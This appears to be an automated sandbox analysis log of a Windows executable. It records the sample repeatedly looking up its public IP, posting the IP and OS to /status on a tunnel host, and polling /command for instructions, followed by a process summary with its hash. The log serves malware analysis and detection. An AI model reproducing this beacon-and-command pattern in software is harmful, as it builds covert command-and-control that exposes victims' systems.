Dec 11, 2024 11:30:15.358217001 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:15.358347893 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49878	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:20.468250990 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:30:21.563906908 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:30:21 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cc7fbd5f0f4a-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=744&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49881	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:21.685508966 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:30:21.806113005 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:30:22.922102928 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:22.922131062 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49886	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:23.043363094 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:30:24.282865047 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:24.282900095 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49902	172.67.74.152	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:29.431309938 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:30:30.531320095 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:30:30 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04ccb7b8c44213-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49904	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:30.653955936 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:30:30.773682117 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:30:31.897289991 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:31.897699118 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49909	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:32.068770885 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:30:33.307296991 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:33.307348013 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49925	104.26.12.205	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:38.573635101 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:30:39.670970917 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:30:39 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04ccf0dd73c42c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1510&min_rtt=1510&rtt_var=755&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49927	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:39.796000004 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:30:40.143383980 CET	210	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:30:40.301363945 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:30:41.419112921 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:41.419150114 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49933	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:41.549937010 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:30:42.778872013 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:42.778956890 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49948	104.26.12.205	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:47.905708075 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:30:48.996546984 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:30:48 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cd2b3e20de99-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1459&rtt_var=729&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49950	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:49.118223906 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:30:49.238981962 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:30:50.358416080 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:50.358472109 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49956	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:50.480128050 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:30:51.724663973 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:51.724770069 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49971	104.26.12.205	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:56.858113050 CET	115	OUT	GET /?format=text HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: api.ipify.org Connection: close
Dec 11, 2024 11:30:57.964129925 CET	425	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 10:30:57 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8f04cd6328f443a5-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1757&rtt_var=878&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49976	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:58.096885920 CET	171	OUT	POST /status HTTP/1.1 Content-Length: 39 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close Content-Type: application/json
Dec 11, 2024 11:30:58.216407061 CET	39	OUT	Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
Dec 11, 2024 11:30:59.324276924 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:30:59.324404001 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49978	167.99.38.229	80	1488	C:\Users\user\Desktop\jgbC220X2U.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 11:30:59.446290970 CET	119	OUT	GET /command HTTP/1.1 User-Agent: cpp-httplib/0.18.0 Accept: / Host: pepwuecibr.eu.loclx.io Connection: close
Dec 11, 2024 11:31:00.681830883 CET	1236	IN	HTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED] Data Raw: Data Ascii:
Dec 11, 2024 11:31:00.681922913 CET	848	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63 Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;

Target ID:	0
Start time:	05:28:57
Start date:	11/12/2024
Path:	C:\Users\user\Desktop\jgbC220X2U.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\jgbC220X2U.exe"
Imagebase:	0x7ff729f80000
File size:	7'131'898 bytes
MD5 hash:	28354F3E0D66D054BF0D05C3CAF1E28A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
